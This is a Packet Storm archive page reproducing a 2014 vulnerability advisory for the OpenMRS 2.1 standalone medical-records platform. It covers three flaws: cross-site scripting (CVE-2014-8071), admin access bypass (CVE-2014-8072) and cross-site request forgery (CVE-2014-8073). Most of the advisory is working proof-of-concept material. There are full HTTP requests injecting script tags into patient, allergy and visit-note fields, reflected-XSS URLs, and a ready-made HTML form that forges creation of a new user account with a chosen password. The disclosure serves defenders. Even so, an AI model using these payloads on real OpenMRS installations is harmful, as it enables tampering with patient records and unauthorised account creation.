exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OpenMRS 2.1 Access Bypass / XSS / CSRF

OpenMRS 2.1 Access Bypass / XSS / CSRF
Posted Oct 20, 2014
Authored by Mahendra

OpenMRS version 2.1 suffers from access bypass, cross site request forgery, and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, bypass, csrf
SHA-256 | ab0dd6bf796e4ab7bab5e40713b3c2083693f2fc69bb1642f1ffdc18694c3592

OpenMRS 2.1 Access Bypass / XSS / CSRF

Change Mirror Download
# Exploit Title: OpenMRS 2.1 (Standalone version) Multiple Security Vulnerabilities
# Date: 20/10/2014
# Remote: Yes
# Exploit Author: Mahendra
# Vendor Homepage: http://openmrs.org
# Software Link: http://sourceforge.net/projects/openmrs/files/releases/OpenMRS_2.1/openmrs-2.1-standalone.zip/download
# Version: 2.1 Standalone

Timeline:
10-10-2014: Issues raised in OpenMRS Jira platform
20-10-2014: No responses received. Advisory released

---------------------------------------------------------------
About OpenMRS
---------------------------------------------------------------
OpenMRS is a software platform and a reference application which enables design of a customized medical records system with no programming knowledge (although medical and systems analysis knowledge is required). It is a common platform upon which medical informatics efforts in developing countries can be built. The system is based on a conceptual database structure which is not dependent on the actual types of medical information required to be collected or on particular data collection forms and so can be customized for different uses.

OpenMRS is now in use around the world (see the OpenMRS Atlas), including South Africa, Kenya, Rwanda, Lesotho, Zimbabwe, Mozambique, Uganda, Tanzania, Haiti, India, China, United States, Pakistan, the Phillipines, and many other places. This work is supported in part by many organizations including international and government aid groups, NGO’s, aswell as for-profit and non-profit corporations.

----------------------------------------------------------------------
Multiple Persistent and Reflected Cross-Site Scripting (CVE-2014-8071)
----------------------------------------------------------------------
Persistent XSS

Parameters that are displayed back to the user are mostly vulnerable to cross-site scripting as user input was not validate properly and as a result, the malicious script was stored by the application and executed when it was displayed back to the user.

Below are several examples on the persistent and reflected XSS identified in OpenMRS 2.1 Standalone

-------------------------
Register a patient page
-------------------------

POST /openmrs-standalone/registrationapp/registerPatient.page?appId=referenceapplication.registrationapp.registerPatient HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8081/openmrs-standalone/registrationapp/registerPatient.page?appId=referenceapplication.registrationapp.registerPatient
Cookie: referenceapplication.lastSessionLocation=3; dashboardTab-1=patientOverviewTab; JSESSIONID=9B21E253E4BEC8E8C07155C00CD54EE6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 393

givenName=<script>alert(1)</script>&familyName=<script>alert(1)</script>&preferred=true&gender=M&birthdateDay=1&birthdateMonth=12&birthdateYear=1989&birthdateYears=&birthdateMonths=&birthdate=1989-12-1&address1=<script>alert(1)</script>&address2=<script>alert(1)</script>&cityVillage=&stateProvince=&country=&postalCode=&phoneNumber=1111

--------------
Allergy page
--------------

POST /openmrs-standalone/allergyui/allergy.page?patientId=82& HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8081/openmrs-standalone/allergyui/allergy.page?patientId=82&
Cookie: referenceapplication.lastSessionLocation=3; dashboardTab-1=patientOverviewTab; JSESSIONID=9B21E253E4BEC8E8C07155C00CD54EE6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 212

allergenType=DRUG&codedAllergen=162298&nonCodedAllergen=&nonCodedAllergen=&nonCodedAllergen=&allergyReactionConcepts=108&reactionNonCoded=&severity=1498&comment=%3Cscript%3Ealert%28%22comment%22%29%3C%2Fscript%3E

----------------
Visit Note page
----------------

POST /openmrs-standalone/htmlformentryui/htmlform/enterHtmlForm/submit.action?successUrl=%2Fopenmrs-standalone%2Fhtmlformentryui%2Fhtmlform%2FenterHtmlFormWithStandardUi.page%3FreturnUrl%3D%2F%2Fwww.google.com%26definitionUiResource%3Dreferenceapplication%3Ahtmlforms%2FsimpleVisitNote.xml%26visitId%3D181fdb76-3e9e-485e-b0cb-4dea548236c7%26patientId%3Db675c8d5-c189-4601-af53-b192941b2c47%26 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8081/openmrs-standalone/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page?patientId=b675c8d5-c189-4601-af53-b192941b2c47&visitId=181fdb76-3e9e-485e-b0cb-4dea548236c7&definitionUiResource=referenceapplication:htmlforms/simpleVisitNote.xml&returnUrl=//www.google.com
Content-Length: 266
Cookie: referenceapplication.lastSessionLocation=3; dashboardTab-1=patientOverviewTab; JSESSIONID=9B21E253E4BEC8E8C07155C00CD54EE6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

personId=82&htmlFormId=2&createVisit=false&formModifiedTimestamp=1412599994000&encounterModifiedTimestamp=0&visitId=509&returnUrl=%2F%2Fwww.google.com&closeAfterSubmission=null&w1=4&w3=2&w5=2014-10-10&encounterDiagnoses=%5B%5D&w10=%3Cscript%3Ealert(2)%3C%2Fscript%3E


Reflected XSS
-----------------

Referer HTTP Header

GET /openmrs-standalone/login.htm HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=74b9b"><script>alert(1)</script>e2a35
Cookie: referenceapplication.lastSessionLocation=3; JSESSIONID=9B21E253E4BEC8E8C07155C00CD54EE6
Connection: keep-alive

http://localhost:8081/openmrs-standalone/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page?patientId=b675c8d5-c189-4601-af53-b192941b2c47&visitId=181fdb76-3e9e-485e-b0cb-4dea548236c7&definitionUiResource=referenceapplication:htmlforms/simpleVisitNote.xml&returnUrl=test<script>alert(1)</script>

http://localhost:8081/openmrs-standalone/htmlformentryui/htmlform/enterHtmlFormWithSimpleUi.page?patientId=31&visitId=1061bc20<script>alert(1)</script>92b77&definitionUiResource=referenceapplication:htmlforms/vitals.xml&returnUrl=/openmrs-standalone/coreapps/patientdashboard/patientDashboard.page?patientId=31&

http://localhost:8081/openmrs-standalone/coreapps/mergeVisits.page?patientId=31&returnUrl=</script><script>alert(1)</script>

-----------------------------------------------------------------------
Access control bypass to administrative interface by non-admin user (CVE-2014-8072)
-----------------------------------------------------------------------

Any non-admin user can access the administration module with read access by simply browse directly to the administration URL.

http://localhost:8081/openmrs-standalone/admin


------------------------------------------------------------------------
Cross-site request forgery (CVE-2014-8073)
------------------------------------------------------------------------

<html>
<body>
<form action="http://localhost:8081/openmrs-standalone/admin/users/user.form" method="POST">
<input type="hidden" name="createNewPerson" value="true" />
<input type="hidden" name="person.names[0].givenName" value="test" />
<input type="hidden" name="person.names[0].middleName" value="test" />
<input type="hidden" name="person.names[0].familyName" value="test" />
<input type="hidden" name="person.gender" value="M" />
<input type="hidden" name="username" value="test" />
<input type="hidden" name="userFormPassword" value="Admin123" />
<input type="hidden" name="confirm" value="Admin123" />
<input type="hidden" name="roleStrings" value="Application: Registers Patients" />
<input type="hidden" name="roleStrings" value="Application: Uses Patient Summary" />
<input type="hidden" name="secretQuestion" value="" />
<input type="hidden" name="secretAnswer" value="" />
<input type="hidden" name="action" value="Save User" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close